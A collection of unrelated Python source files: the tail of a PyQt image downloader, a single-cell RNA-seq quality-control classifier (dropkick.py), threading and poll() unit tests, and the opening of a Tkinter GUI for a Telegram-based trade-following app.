0), Qt.ItemDataRole.DisplayRole) url = prefix + key + suffix yield_list.append([index, key, url, self.rawData["CODES"][key]]) for item in yield_list: yield item def ProcessRefreshThread(self): while True: try: self.ProcessRefresh() except Exception as e: print(e) def DownloadTread(self, g): while True: try: with mutex: index, key, url, pos = next(g) except StopIteration: break model = self.model with mutex: print(index, key, pos, threading.current_thread().name) # sleep(0.3) res = download(url, f"{key}.png", os.path.join(self.CurrentDir, pos[0], pos[1])) if res['code'] == 0: model.setItem(index, 1, QStandardItem("√")) else: model.setItem(index, 1, QStandardItem(res['msg'])) self.CurrentFinished += 1 self.psSig.emit() if __name__ == '__main__': if getattr(sys, 'frozen', None): basedir = sys._MEIPASS else: basedir = os.path.dirname(__file__) dirname = basedir plugin_path = os.path.join(dirname, 'platforms') os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = plugin_path print(plugin_path) QApplication.setStyle('Fusion') app = QApplication(sys.argv) ex = MainWindow() sys.exit(app.exec())
dropkick.py
# -*- coding: utf-8 -*- """ Automated QC classifier pipeline @author: C Heiser """ import argparse import sys import os, errno import numpy as np import matplotlib.pyplot as plt import scanpy as sc import time import threading from skimage.filters import threshold_li, threshold_otsu, threshold_mean from logistic import LogitNet class Spinner: busy = False delay = 0.1 @staticmethod def spinning_cursor(): while 1: for cursor in "|/-\\": yield cursor def __init__(self, delay=None): self.spinner_generator = self.spinning_cursor() if delay and float(delay): self.delay = delay def spinner_task(self): while self.busy: sys.stdout.write(next(self.spinner_generator)) sys.stdout.flush() time.sleep(self.delay) sys.stdout.write("\b") sys.stdout.flush() def __enter__(self): self.busy = True threading.Thread(target=self.spinner_task).start() def __exit__(self, exception, value, tb): self.busy = False time.sleep(self.delay) if exception is not None: return False def check_dir_exists(path): """ Checks if directory already exists or not and creates it if it doesn't """ try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise def recipe_dropkick( adata, X_final="raw_counts", filter=True, calc_metrics=True, mito_names="^mt-|^MT-", n_ambient=10, target_sum=None, n_hvgs=2000, verbose=True, ): """ scanpy preprocessing recipe Parameters: adata (AnnData.AnnData): object with raw counts data in .X X_final (str): which normalization should be left in .X slot? ("raw_counts","arcsinh_norm","norm_counts") filter (bool): remove cells and genes with zero total counts calc_metrics (bool): if False, do not calculate metrics in .obs/.var mito_names (str): substring encompassing mitochondrial gene names for calculation of mito expression n_ambient (int): number of ambient genes to call. top genes by cells. target_sum (int): total sum of counts for each cell prior to arcsinh and log1p transformations; default None to use median counts. n_hvgs (int or None): number of HVGs to calculate using Seurat method if None, do not calculate HVGs verbose (bool): print updates to the console? Returns: AnnData.AnnData: adata is edited in place to include: - useful .obs and .var columns ("total_counts", "pct_counts_mito", "n_genes_by_counts", etc.) - raw counts (adata.layers["raw_counts"]) - normalized counts (adata.layers["norm_counts"]) - arcsinh transformation of normalized counts (adata.X) - highly variable genes if desired (adata.var["highly_variable"]) """ if filter: # remove cells and genes with zero total counts orig_shape = adata.shape sc.pp.filter_cells(adata, min_genes=10) sc.pp.filter_genes(adata, min_counts=1) if adata.shape[0] != orig_shape[0]: print( "Ignoring {} cells with zero total counts".format( orig_shape[0] - adata.shape[0] ) ) if adata.shape[1] != orig_shape[1]: print( "Ignoring {} genes with zero total counts".format( orig_shape[1] - adata.shape[1] ) ) # store raw counts before manipulation adata.layers["raw_counts"] = adata.X.copy() if calc_metrics: if verbose: print("Calculating metrics:") # identify mitochondrial genes adata.var["mito"] = adata.var_names.str.contains(mito_names) # identify putative ambient genes by lowest dropout pct (top 10) adata.var["ambient"] = np.array( adata.X.astype(bool).sum(axis=0) / adata.n_obs ).squeeze() if verbose: print( "Top {} ambient genes have dropout rates between {} and {} percent:\n\t{}".format( n_ambient, round((1 - adata.var.ambient.nlargest(n=n_ambient).max()) * 100, 2), round((1 - adata.var.ambient.nlargest(n=n_ambient).min()) * 100, 2), adata.var.ambient.nlargest(n=n_ambient).index.tolist(), ) ) adata.var["ambient"] = ( adata.var.ambient >= adata.var.ambient.nlargest(n=n_ambient).min() ) # calculate standard qc .obs and .var sc.pp.calculate_qc_metrics( adata, qc_vars=["mito", "ambient"], inplace=True, percent_top=[10, 50, 100] ) # other arcsinh-transformed metrics adata.obs["arcsinh_total_counts"] = np.arcsinh(adata.obs["total_counts"]) adata.obs["arcsinh_n_genes_by_counts"] = np.arcsinh( adata.obs["n_genes_by_counts"] ) # log1p transform (adata.layers["log1p_norm"]) sc.pp.normalize_total(adata, target_sum=target_sum, layers=None, layer_norm=None) adata.layers["norm_counts"] = adata.X.copy() # save to .layers sc.pp.log1p(adata) adata.layers["log1p_norm"] = adata.X.copy() # save to .layers # HVGs if n_hvgs is not None: if verbose: print("Determining {} highly variable genes".format(n_hvgs)) sc.pp.highly_variable_genes( adata, n_top_genes=n_hvgs, n_bins=20, flavor="seurat" ) # arcsinh-transform normalized counts to leave in .X adata.X = np.arcsinh(adata.layers["norm_counts"]) sc.pp.scale(adata) # scale genes for feeding into model adata.layers[ "arcsinh_norm" ] = adata.X.copy() # save arcsinh scaled counts in .layers # set .X as desired for downstream processing; default raw_counts adata.X = adata.layers[X_final].copy() def auto_thresh_obs( adata, obs_cols=["arcsinh_n_genes_by_counts", "pct_counts_ambient"], method="otsu", ): """ automated thresholding on metrics in adata.obs Parameters: adata (anndata.AnnData): object containing unfiltered scRNA-seq data obs_cols (list of str): name of column(s) to threshold from adata.obs method (str): one of 'otsu' (default), 'li', or 'mean' Returns: thresholds (dict): keys are obs_cols and values are threshold results """ thresholds = dict.fromkeys(obs_cols) # initiate output dictionary for col in obs_cols: tmp = np.array(adata.obs[col]) if method == "otsu": thresholds[col] = threshold_otsu(tmp) elif method == "li": thresholds[col] = threshold_li(tmp) elif method == "mean": thresholds[col] = threshold_mean(tmp) else: raise ValueError( "Please provide a valid threshold method ('otsu', 'li', 'mean')." ) return thresholds def plot_thresh_obs(adata, thresholds, bins=40, show=True): """ plot automated thresholding on metrics in adata.obs as output by auto_thresh_obs() Parameters: adata (anndata.AnnData): object containing unfiltered scRNA-seq data thresholds (dict): output of auto_thresh_obs() function bins (int): number of bins for histogram show (bool): show plot or return object Returns: plot of distributions of obs_cols in thresholds dictionary with corresponding threshold values """ fig, axes = plt.subplots( ncols=len(thresholds), nrows=1, figsize=(len(thresholds) * 4, 4), sharey=True ) axes[0].set_ylabel("cells") for i in range(len(thresholds)): axes[i].hist(adata.obs[list(thresholds.keys())[i]], bins=bins) axes[i].axvline(list(thresholds.values())[i], color="r") axes[i].set_title(list(thresholds.keys())[i]) fig.tight_layout() if show: plt.show() else: return fig def filter_thresh_obs( adata, thresholds, obs_cols=["arcsinh_n_genes_by_counts", "pct_counts_ambient"], directions=["above", "below"], inclusive=True, name="thresh_filter", ): """ filter cells by thresholding on metrics in adata.obs as output by auto_thresh_obs() Parameters: adata (anndata.AnnData): object containing unfiltered scRNA-seq data thresholds (dict): output of auto_thresh_obs() function obs_cols (list of str): name of column(s) to threshold from adata.obs directions (list of str): 'below' or 'above', indicating which direction to keep (label=1) inclusive (bool): include cells at the thresholds? default True. name (str): name of .obs col containing final labels Returns: updated adata with filter labels in adata.obs[name] """ # initialize .obs column as all "good" cells adata.obs[name] = 1 # if any criteria are NOT met, label cells "bad" for i in range(len(obs_cols)): if directions[i] == "above": if inclusive: adata.obs.loc[ (adata.obs[name] == 1) & (adata.obs[obs_cols[i]] <= thresholds[obs_cols[i]]), name, ] = 0 else: adata.obs.loc[ (adata.obs[name] == 1) & (adata.obs[obs_cols[i]] < thresholds[obs_cols[i]]), name, ] = 0 elif directions[i] == "below": if inclusive: adata.obs.loc[ (adata.obs[name] == 1) & (adata.obs[obs_cols[i]] >= thresholds[obs_cols[i]]), name, ] = 0 else: adata.obs.loc[ (adata.obs[name] == 1) & (adata.obs[obs_cols[i]] > thresholds[obs_cols[i]]), name, ] = 0 def dropkick( adata, mito_names="^mt-|^MT-", n_hvgs=2000, thresh_method="otsu", metrics=["arcsinh_n_genes_by_counts", "pct_counts_ambient",], directions=["above", "below"], alphas=[0.1], n_lambda=10, cut_point=1, n_splits=5, max_iter=100000, n_jobs=-1, seed=18, ): """ generate logistic regression model of cell quality Parameters: adata (anndata.AnnData): object containing unfiltered, raw scRNA-seq counts in .X layer mito_names (str): substring encompassing mitochondrial gene names for calculation of mito expression n_hvgs (int or None): number of HVGs to calculate using Seurat method if None, do not calculate HVGs thresh_method (str): one of 'otsu' (default), 'li', or 'mean' metrics (list of str): name of column(s) to threshold from adata.obs directions (list of str): 'below' or 'above', indicating which direction to keep (label=1) alphas (tuple of int): alpha values to test using glmnet with n-fold cross validation n_lambda (int): number of lambda values to test in glmnet cut_point (float): The cut point to use for selecting lambda_best. arg_max lambda cv_score(lambda)>=cv_score(lambda_max)-cut_point*standard_error(lambda_max) n_splits (int): number of splits for n-fold cross validation max_iter (int): number of iterations for glmnet optimization n_jobs (int): number of threads for cross validation by glmnet seed (int): random state for cross validation by glmnet Returns: adata_thresh (dict): dictionary of automated thresholds on heuristics rc (LogisticRegression): trained logistic regression classifier updated adata inplace to include 'train', 'dropkick_score', and 'dropkick_label' columns in .obs """ # 0) preprocess counts and calculate required QC metrics a = adata.copy() # make copy of anndata before manipulating recipe_dropkick( a, X_final="arcsinh_norm", filter=True, calc_metrics=True, mito_names=mito_names, n_hvgs=n_hvgs, target_sum=None, verbose=True, ) # 1) threshold chosen heuristics using automated method print("Thresholding on heuristics for training labels:\n\t{}".format(metrics)) adata_thresh = auto_thresh_obs(a, method=thresh_method, obs_cols=metrics) # 2) create labels from combination of thresholds filter_thresh_obs( a, adata_thresh, obs_cols=metrics, directions=directions, inclusive=True, name="train", ) X = a.X[:, a.var.highly_variable].copy() # final X is HVGs y = a.obs["train"].copy(deep=True) # final y is "train" labels from step 2 if len(alphas) > 1: # 3.1) cross-validation to choose alpha and lambda values cv_scores = {"rc": [], "lambda": [], "alpha": [], "score": []} # dictionary o/p for alpha in alphas: print("Training LogitNet with alpha: {}".format(alpha), end=" ") rc = LogitNet( alpha=alpha, n_lambda=n_lambda, cut_point=cut_point, n_splits=n_splits, max_iter=max_iter, n_jobs=n_jobs, random_state=seed, ) with Spinner(): rc.fit(adata=a, y=y, n_hvgs=n_hvgs) print("\n", end="") cv_scores["rc"].append(rc) cv_scores["alpha"].append(alpha) cv_scores["lambda"].append(rc.lambda_best_) cv_scores["score"].append(rc.score(X, y, lamb=rc.lambda_best_)) # determine optimal lambda and alpha values by accuracy score lambda_ = cv_scores["lambda"][ cv_scores["score"].index(max(cv_scores["score"])) ] # choose alpha value alpha_ = cv_scores["alpha"][ cv_scores["score"].index(max(cv_scores["score"])) ] # choose l1 ratio rc_ = cv_scores["rc"][ cv_scores["score"].index(max(cv_scores["score"])) ] # choose classifier print("Chosen lambda value: {}; Chosen alpha value: {}".format(lambda_, alpha_)) else: # 3.2) train model with single alpha value print("Training LogitNet with alpha: {}".format(alphas[0]), end=" ") rc_ = LogitNet( alpha=alphas[0], n_lambda=n_lambda, cut_point=cut_point, n_splits=n_splits, max_iter=max_iter, n_jobs=n_jobs, random_state=seed, ) with Spinner(): rc_.fit(adata=a, y=y, n_hvgs=n_hvgs) print("\n", end="") lambda_, alpha_ = rc_.lambda_best_, alphas[0] # 4) use ridge model to assign scores and labels to original adata print("Assigning scores and labels") adata.obs.loc[a.obs_names, "dropkick_score"] = rc_.predict_proba(X)[:, 1] adata.obs.dropkick_score.fillna(0, inplace=True) # fill ignored cells with zeros adata.obs.loc[a.obs_names, "dropkick_label"] = rc_.predict(X) adata.obs.dropkick_label.fillna(0, inplace=True) # fill ignored cells with zeros for metric in metrics: adata.obs.loc[a.obs_names, metric] = a.obs[metric] adata.obs[metric].fillna(0, inplace=True) # fill ignored cells with zeros adata.var.loc[a.var_names[a.var.highly_variable], "dropkick_coef"] = rc_.coef_.squeeze() # 5) save model hyperparameters in .uns adata.uns["dropkick_thresholds"] = adata_thresh adata.uns["dropkick_args"] = { "n_hvgs": n_hvgs, "thresh_method": thresh_method, "metrics": metrics, "directions": directions, "alphas": alphas, "chosen_alpha": alpha_, "chosen_lambda": lambda_, "n_lambda": n_lambda, "cut_point": cut_point, "n_splits": n_splits, "max_iter": max_iter, "seed": seed, } # save command-line arguments to .uns for reference print("Done!\n") return rc_ def coef_inventory(adata, n=10): """ return highest and lowest coefficient values from logistic regression model, along with sparsity Parameters: adata (anndata.AnnData): object generated from dropkick.py ("regression") n (int): number of genes to show at top and bottom of coefficient list Returns: prints top and bottom n genes by their coefficient values """ print("\nTop HVGs by coefficient value (good cells):") print(adata.var.loc[-adata.var.dropkick_coef.isna(), "dropkick_coef"].nlargest(n)) print("\nBottom HVGs by coefficient value (bad droplets):") print(adata.var.loc[-adata.var.dropkick_coef.isna(), "dropkick_coef"].nsmallest(n)) n_zero = (adata.var.dropkick_coef==0).sum() n_coef = (-adata.var.dropkick_coef.isna()).sum() sparsity = round((n_zero/n_coef)*100, 3) print("\n{} coefficients equal to zero. Model sparsity: {} %\n".format(n_zero, sparsity)) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "counts", type=str, help="Input (cell x gene) counts matrix as .h5ad or tab delimited text file", ) parser.add_argument( "--obs-cols", type=str, help="Heuristics for thresholding. Several can be specified with '--obs-cols arcsinh_n_genes_by_counts pct_counts_ambient'", nargs="+", default=["arcsinh_n_genes_by_counts", "pct_counts_ambient"], ) parser.add_argument( "--directions", type=str, help="Direction of thresholding for each heuristic. Several can be specified with '--obs-cols above below'", nargs="+", default=["above", "below"], ) parser.add_argument( "--thresh-method", type=str, help="Method used for automatic thresholding on heuristics. One of ['otsu','li','mean']. Default 'Otsu'", default="otsu", ) parser.add_argument( "--mito-names", type=str, help="Substring or regex defining mitochondrial genes. Default '^mt-|^MT-'", default="^mt-|^MT-", ) parser.add_argument( "--n-hvgs", type=int, help="Number of highly variable genes for training model. Default 2000", default=2000, ) parser.add_argument( "--seed", type=int, help="Random state for cross validation", default=18, ) parser.add_argument( "--output-dir", type=str, help="Output directory. Output will be placed in [output-dir]/[name]...", nargs="?", default=".", ) parser.add_argument( "--alphas", type=float, help="Ratios between l1 and l2 regularization for regression model", nargs="*", default=[0.1], ) parser.add_argument( "--n-lambda", type=int, help="Number of lambda (regularization strength) values to test. Default 10", default=10, ) parser.add_argument( "--cut-point", type=float, help="The cut point to use for selecting lambda_best. Default 1.0", default=1.0, ) parser.add_argument( "--n-splits", type=int, help="Number of splits for cross validation. Default 5", default=5, ) parser.add_argument( "--n-iter", type=int, help="Maximum number of iterations for optimization. Default 100000", default=100000, ) parser.add_argument( "--n-jobs", type=int, help="Maximum number of threads for cross validation. Default -1", default=-1, ) args = parser.parse_args() # read in counts data print("\nReading in unfiltered counts from {}".format(args.counts), end="") adata = sc.read(args.counts) print(" - {} barcodes and {} genes".format(adata.shape[0], adata.shape[1])) # check that output directory exists, create it if needed. check_dir_exists(args.output_dir) # get basename of file for writing outputs name = os.path.splitext(os.path.basename(args.counts))[0] regression_model = dropkick( adata, mito_names=args.mito_names, n_hvgs=args.n_hvgs, thresh_method=args.thresh_method, metrics=args.obs_cols, directions=args.directions, alphas=args.alphas, n_lambda=args.n_lambda, cut_point=args.cut_point, n_splits=args.n_splits, max_iter=args.n_iter, n_jobs=args.n_jobs, seed=args.seed, ) # generate plot of chosen training thresholds on heuristics print( "Saving threshold plots to {}/{}_{}_thresholds.png".format( args.output_dir, name, args.thresh_method ) ) thresh_plt = plot_thresh_obs( adata, adata.uns["dropkick_thresholds"], bins=40, show=False ) plt.savefig( "{}/{}_{}_thresholds.png".format(args.output_dir, name, args.thresh_method) ) # save new labels print( "Writing updated counts to {}/{}_{}.h5ad".format( args.output_dir, name, args.command ) ) adata.write( "{}/{}_dropkick.h5ad".format(args.output_dir, name), compression="gzip", )
parallel.py
# coding: utf-8 """ brownie.tests.parallel ~~~~~~~~~~~~~~~~~~~~~~ Tests for :mod:`brownie.parallel`. :copyright: 2010-2011 by Daniel Neuhäuser :license: BSD, see LICENSE.rst for details """ from __future__ import with_statement import time from threading import Thread from attest import Tests, Assert, TestBase, test from brownie.parallel import get_cpu_count, AsyncResult, TimeoutError tests = Tests() @tests.test def test_get_cpu_count(): try: Assert(get_cpu_count()) > 0 Assert(get_cpu_count()) == get_cpu_count() except NotImplementedError: # make sure default is returned if the number of processes cannot be # determined Assert(get_cpu_count(2)) == 2 class TestAsyncResult(TestBase): @test def wait(self): aresult = AsyncResult() def setter(aresult): time.sleep(1) aresult.set('foo') t = Thread(target=setter, args=(aresult, )) t.start() with Assert.not_raising(TimeoutError): aresult.wait(2) @test def get(self): aresult = AsyncResult() with Assert.raises(TimeoutError): aresult.get(0.1) def setter(aresult): time.sleep(1) aresult.set('foo') t = Thread(target=setter, args=(aresult, )) t.start() with Assert.not_raising(TimeoutError): Assert(aresult.get(2)) == 'foo' aresult.set('foo') Assert(aresult.get()) == 'foo' aresult = AsyncResult() aresult.set(ValueError(), success=False) with Assert.raises(ValueError): aresult.get() @test def callback_errback(self): testruns = (['callback', True], ['errback', False]) for kwarg, success in testruns: l = [] callback = lambda obj, l=l: l.append(obj) aresult = AsyncResult(**{kwarg: callback}) assert not aresult.ready aresult.set('foo', success=success) Assert(len(l)) == 1 Assert(l[0]) == 'foo' @test def repr(self): aresult = AsyncResult() Assert(repr(aresult)) == 'AsyncResult()' aresult = AsyncResult(callback=1) Assert(repr(aresult)) == 'AsyncResult(callback=1)' aresult = AsyncResult(errback=1) Assert(repr(aresult)) == 'AsyncResult(errback=1)' aresult = AsyncResult(callback=1, errback=2) Assert(repr(aresult)) == 'AsyncResult(callback=1, errback=2)' tests.register(TestAsyncResult)
test_poll.py
# Test case for the os.poll() function import os import subprocess import random import select import threading import time import unittest from test.support import TESTFN, run_unittest, reap_threads, cpython_only import sys try: select.poll except AttributeError: raise unittest.SkipTest("select.poll not defined") if sys.platform == 'OpenVMS': raise unittest.SkipTest("OpenVMS does not support select.poll") def find_ready_matching(ready, flag): match = [] for fd, mode in ready: if mode & flag: match.append(fd) return match class PollTests(unittest.TestCase): def test_poll1(self): # Basic functional test of poll object # Create a bunch of pipe and test that poll works with them. p = select.poll() NUM_PIPES = 12 MSG = b" This is a test." MSG_LEN = len(MSG) readers = [] writers = [] r2w = {} w2r = {} for i in range(NUM_PIPES): rd, wr = os.pipe() p.register(rd) p.modify(rd, select.POLLIN) p.register(wr, select.POLLOUT) readers.append(rd) writers.append(wr) r2w[rd] = wr w2r[wr] = rd bufs = [] while writers: ready = p.poll() ready_writers = find_ready_matching(ready, select.POLLOUT) if not ready_writers: raise RuntimeError("no pipes ready for writing") wr = random.choice(ready_writers) os.write(wr, MSG) ready = p.poll() ready_readers = find_ready_matching(ready, select.POLLIN) if not ready_readers: raise RuntimeError("no pipes ready for reading") rd = random.choice(ready_readers) buf = os.read(rd, MSG_LEN) self.assertEqual(len(buf), MSG_LEN) bufs.append(buf) os.close(r2w[rd]) ; os.close( rd ) p.unregister( r2w[rd] ) p.unregister( rd ) writers.remove(r2w[rd]) self.assertEqual(bufs, [MSG] * NUM_PIPES) def test_poll_unit_tests(self): # returns NVAL for invalid file descriptor FD, w = os.pipe() os.close(FD) os.close(w) p = select.poll() p.register(FD) r = p.poll() self.assertEqual(r[0], (FD, select.POLLNVAL)) with open(TESTFN, 'w') as f: fd = f.fileno() p = select.poll() p.register(f) r = p.poll() self.assertEqual(r[0][0], fd) r = p.poll() self.assertEqual(r[0], (fd, select.POLLNVAL)) os.unlink(TESTFN) # type error for invalid arguments p = select.poll() self.assertRaises(TypeError, p.register, p) self.assertRaises(TypeError, p.unregister, p) # can't unregister non-existent object p = select.poll() self.assertRaises(KeyError, p.unregister, 3) # Test error cases pollster = select.poll() class Nope: pass class Almost: def fileno(self): return 'fileno' self.assertRaises(TypeError, pollster.register, Nope(), 0) self.assertRaises(TypeError, pollster.register, Almost(), 0) # Another test case for poll(). This is copied from the test case for # select(), modified to use poll() instead. def test_poll2(self): cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done' proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, bufsize=0) proc.__enter__() self.addCleanup(proc.__exit__, None, None, None) p = proc.stdout pollster = select.poll() pollster.register( p, select.POLLIN ) for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10: fdlist = pollster.poll(tout) if (fdlist == []): continue fd, flags = fdlist[0] if flags & select.POLLHUP: line = p.readline() if line != b"": self.fail('error: pipe seems to be closed, but still returns data') continue elif flags & select.POLLIN: line = p.readline() if not line: break self.assertEqual(line, b'testing...\n') continue else: self.fail('Unexpected return value from select.poll: %s' % fdlist) def test_poll3(self): # test int overflow pollster = select.poll() pollster.register(1) self.assertRaises(OverflowError, pollster.poll, 1 << 64) x = 2 + 3 if x != 5: self.fail('Overflow must have occurred') # Issues #15989, #17919 self.assertRaises(ValueError, pollster.register, 0, -1) self.assertRaises(OverflowError, pollster.register, 0, 1 << 64) self.assertRaises(ValueError, pollster.modify, 1, -1) self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64) @cpython_only def test_poll_c_limits(self): from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX pollster = select.poll() pollster.register(1) # Issues #15989, #17919 self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1) self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1) self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1) self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1) @reap_threads def test_threaded_poll(self): r, w = os.pipe() self.addCleanup(os.close, r) self.addCleanup(os.close, w) rfds = [] for i in range(10): fd = os.dup(r) self.addCleanup(os.close, fd) rfds.append(fd) pollster = select.poll() for fd in rfds: pollster.register(fd, select.POLLIN) t = threading.Thread(target=pollster.poll) t.start() try: time.sleep(0.5) # trigger ufds array reallocation for fd in rfds: pollster.unregister(fd) pollster.register(w, select.POLLOUT) self.assertRaises(RuntimeError, pollster.poll) finally: # and make the call to poll() from the thread return os.write(w, b'spam') t.join() @unittest.skipUnless(threading, 'Threading required for this test.') @reap_threads def test_poll_blocks_with_negative_ms(self): for timeout_ms in [None, -1000, -1, -1.0, -0.1, -1e-100]: # Create two file descriptors. This will be used to unlock # the blocking call to poll.poll inside the thread r, w = os.pipe() pollster = select.poll() pollster.register(r, select.POLLIN) poll_thread = threading.Thread(target=pollster.poll, args=(timeout_ms,)) poll_thread.start() poll_thread.join(timeout=0.1) self.assertTrue(poll_thread.is_alive()) # Write to the pipe so pollster.poll unblocks and the thread ends. os.write(w, b'spam') poll_thread.join() self.assertFalse(poll_thread.is_alive()) os.close(r) os.close(w) def test_main(): run_unittest(PollTests) if __name__ == '__main__': test_main()
base_trade_app.py
import tkinter as tk from tkinter import ttk, font, messagebox import telethon from config import Config from functools import partial import threading import logging.handlers import sys import constants from styles import UI import utils import textwrap import os from sys import platform as _platform logger = logging.getLogger('tft') rotate_file_handler = logging.handlers.RotatingFileHandler(utils.get_dir_path_by_platform() + "tft.log", encoding='utf-8', maxBytes=1024 * 1024 * 2, backupCount=5) stdout_handler = logging.StreamHandler(sys.stdout) stdout_handler.setLevel(logging.INFO) stderr_handler = logging.StreamHandler(sys.stderr) stdout_handler.setLevel(logging.ERROR) handlers = [rotate_file_handler, stdout_handler, stderr_handler] logging.basicConfig( level=logging.INFO, format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s', handlers=handlers ) class BaseTradeApp(): app = None trade_app = None login_form = None config = Config() telegram_dialog_list = [] async_loop = None tg = None # Disclaimer disclaimer_form = None # Login form login_form = None api_id_label = None api_id_var = None api_id_entry = None api_hash_label = None api_hash_var = None api_hash_entry = None phone_number_label = None phone_number_var = None phone_number_entry = None login_button = None verify_button_var = None # Verify form verify_phone_form = None verify_password_form = None # Trade App app_title = 'Telegram Follow Trader' # Setting selected_dialog_id = None selected_trade_mode = None # GUI setting_trade_app_frame = None console_trade_app_frame = None remark_trade_app_frame = None label_frame_font_style = None label_font_style = None label_width = None input_width = None # GUI - dialog dialog_frame = None dialog_select_frame = None dialog_select = None dialog_update_button = None dialog_button_frame = None dialog_test_button = None dialog_save_setting_button = None open_buy_template_var = None open_buy_template_entry = None close_buy_template_var = None close_buy_template_entry = None open_sell_template_var = None open_sell_template_entry = None close_sell_template_var = None close_sell_template_entry = None time_format_var = None time_format_entry = None # GUI - Trade Account trade_account_frame = None trade_password_entry = None trade_port_entry = None trade_port_var = None trade_password_test_button = None # GUI - Trade Setting trade_setting_frame = None trade_setting_frame_1 = None trade_mode_frame = None trade_mode_var = None trade_mode_fixed_quantity = None trade_mode_max_quantity = None trade_product_frame = None trade_product_hsi_var = None trade_product_mhi_var = None trade_product_hsi = None trade_product_mhi = None trade_quantity_frame = None hsi_trade_quantity_var = None hsi_trade_quantity_entry = None mhi_trade_quantity_var = None mhi_trade_quantity_entry = None hsi_margin_frame = None hsi_margin_var = None hsi_margin_entry = None mhi_margin_frame = None mhi_margin_var = None mhi_margin_entry = None trade_setting_frame_2 = None trade_period_frame = None trade_period_morning_var = None trade_period_afternoon_var = None trade_period_night_var = None trade_period_morning = None trade_period_afternoon = None trade_period_night = None open_extra_price_frame = None open_extra_price_var = None open_extra_price_entry = None close_price_adjust_interval_frame = None close_price_adjust_interval_var = None close_price_adjust_interval_entry = None cancel_unfulfilled_order_after_second_frame = None cancel_unfulfilled_order_after_second_var = None cancel_unfulfilled_order_after_second_entry = None trade_only_within_second_frame = None trade_only_within_second_var = None trade_only_within_second_entry = None trade_setting_frame_3 = None manual_confirm_trade_message_var = None manual_confirm_trade_message = None start_button_font_style = None start_follow_trade_button = None # GUI Console console_text_cache = "" console_text_cache_time = "" console_text = None clear_console_button = None # GUI Remark disclaimer_link = None github_link = None def __init__(self, loop): self.async_loop = loop disclaimer_version, disclaimer_content = utils.get_disclaimer_version_and_content() local_disclaimer_version = self.config.get_disclaimer_version() self.app = tk.Tk() if _platform != constants.MAC_PLATFORM_NAME: icon_file = "icon.ico" if not hasattr(sys, "frozen"): icon_file = os.path.join(os.path.dirname(__file__), icon_file) else: icon_file = os.path.join(sys.prefix, icon_file) if os.path.exists(icon_file): self.app.iconbitmap(True, icon_file) self.load_login_form_gui() self.load_login_form_config() self.app.lift() self.app.attributes('-topmost', True) self.app.attributes('-topmost', False) if disclaimer_version is not None and disclaimer_version != local_disclaimer_version: self.config.save_disclaimer_version(disclaimer_version) self.config.save_disclaimer_understand_and_agree("N") is_accepted = self.config.get_disclaimer_understand_and_agree() if is_accepted != "Y": self.app.withdraw() self.load_disclaimer(disclaimer_content) self.app.protocol("WM_DELETE_WINDOW", self.quit_app) self.app.mainloop() def quit_app(self): pass def agree_disclaimer(self): self.config.save_disclaimer_understand_and_agree("Y") self.disclaimer_form.destroy() self.app.deiconify() self.app.lift() def load_disclaimer(self, disclaimer_content=None, read_only=False): if read_only is True: disclaimer_version, disclaimer_content = utils.get_disclaimer_version_and_content() def agree_checkbox_on_change(): if agree_var1.get() is True and agree_var2.get() is True: self.enable_elements(confirm_button) else: self.disable_elements(confirm_button) disclaimer_form = tk.Toplevel(self.app) disclaimer_form.resizable(False, False) disclaimer_form.grab_set() disclaimer_form.lift() disclaimer_form.attributes('-topmost', True) disclaimer_form.attributes('-topmost', False) screenwidth = disclaimer_form.winfo_screenwidth() screenheight = disclaimer_form.winfo_screenheight() width = UI.Disclaimer.WIDTH height = UI.Disclaimer.HEIGHT if read_only is True: height = UI.Disclaimer.READ_ONLY_HEIGHT disclaimer_form.geometry('%dx%d+%d+%d' % (width, height, (screenwidth / 2) - (width / 2), (screenheight / 2) - (height / 2))) disclaimer_form.title(self.app_title) title_font = tk.font.Font(size=UI.Disclaimer.TITLE_FONT_SIZE, underline=True, weight="bold") title = tk.Label(disclaimer_form, text="免責聲明", anchor=tk.W, font=title_font) title.pack() content_font = tk.font.Font(size=UI.Disclaimer.CONTENT_FONT_SIZE) content_frame = tk.Frame(disclaimer_form) canvas = tk.Canvas(content_frame, width=UI.Disclaimer.CANVAS_WIDTH, height=UI.Disclaimer.CANVAS_HEIGHT) scrollbar = ttk.Scrollbar(content_frame, orient=tk.VERTICAL, command=canvas.yview) scrollable_frame = tk.Frame(canvas) scrollable_frame.bind( "<Configure>", lambda e: canvas.configure( scrollregion=canvas.bbox(tk.ALL) ) ) canvas.create_window((0, 0), window=scrollable_frame, anchor=tk.NW) canvas.configure(yscrollcommand=scrollbar.set) if disclaimer_content is not None: disclaimer_content_line_list = disclaimer_content.split("\n") for line in disclaimer_content_line_list: tk.Label(scrollable_frame, text=line, width=UI.Disclaimer.LABEL_WIDTH, anchor=tk.W, justify=tk.LEFT, font=content_font, wraplength=UI.Disclaimer.WRAP_LENGTH, padx=UI.Disclaimer.PADDING).pack() else: tk.Label(scrollable_frame, text="無法載入內文,請參閱以下網頁的內容:", anchor=tk.W, justify=tk.LEFT, font=content_font).grid(row=0, column=0, padx=UI.Disclaimer.PADDING, sticky=tk.W) disclaimer_link = tk.Label(scrollable_frame, text=constants.DISCLAIMER_LINK, anchor=tk.W, justify=tk.LEFT, fg="blue", cursor="hand2", font=content_font) disclaimer_link.grid(row=1, column=0, padx=UI.Disclaimer.PADDING, sticky=tk.W) disclaimer_link.bind("<Button-1>", lambda e: utils.open_link(constants.DISCLAIMER_LINK)) tk.Label(scrollable_frame, text="所有免責聲明條款以網頁版本內文為準。", anchor=tk.W, justify=tk.LEFT, font=content_font).grid(row=2, column=0, padx=UI.Disclaimer.PADDING, sticky=tk.W) content_frame.pack() canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True) scrollbar.pack(side=tk.RIGHT, fill=tk.Y) if read_only is False: agree_var1 = tk.BooleanVar() agree_checkbox1 = 